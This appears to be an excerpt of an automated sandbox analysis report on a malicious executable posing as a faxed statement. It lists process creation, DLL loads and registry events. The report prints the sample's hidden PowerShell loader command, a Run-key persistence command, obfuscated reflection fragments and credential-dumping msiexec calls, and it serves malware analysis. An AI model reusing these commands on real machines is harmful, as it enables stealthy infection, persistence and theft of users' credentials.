            Source: msiexec.exe, 0000000B.00000002.2373041564.0000000004B6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: msiexec.exe, msiexec.exe, 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeFile read: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_12-32919
            Source: unknownProcess created: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe "C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe"
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dpsucystvthkeylilntioief"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy"
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dpsucystvthkeylilntioief"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)"Jump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeFile written: C:\Users\user\Desktop\Tolpklasse.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Vandets $Hint $Sennepsfrene58), (Skovbrugs @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Telefonrrets = [AppDomain]::CurrentDomain.GetAssemblies()$global
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($malerarbejde)), $Bomberbekattestregernes).DefineDynamicModule($Indkbsforeningens, $false).DefineType($Supersilent, $Brandsikringen, [S
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)"
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED2806 push ecx; ret 6_2_24ED2819
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_044D6A27 push esp; ret 6_2_044D6A2B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_044D46E3 push ebx; retf 6_2_044D46E4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_044D189D push edx; ret 6_2_044D189E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_044D0EA3 push esp; iretd 6_2_044D0EA5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_044D1F4B push esp; iretd 6_2_044D1F4D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_044D0BEC push cs; iretw 6_2_044D0BED
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_044D19BD push 0000002Ch; ret 6_2_044D19BF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ventetiders38Jump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ventetiders38Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
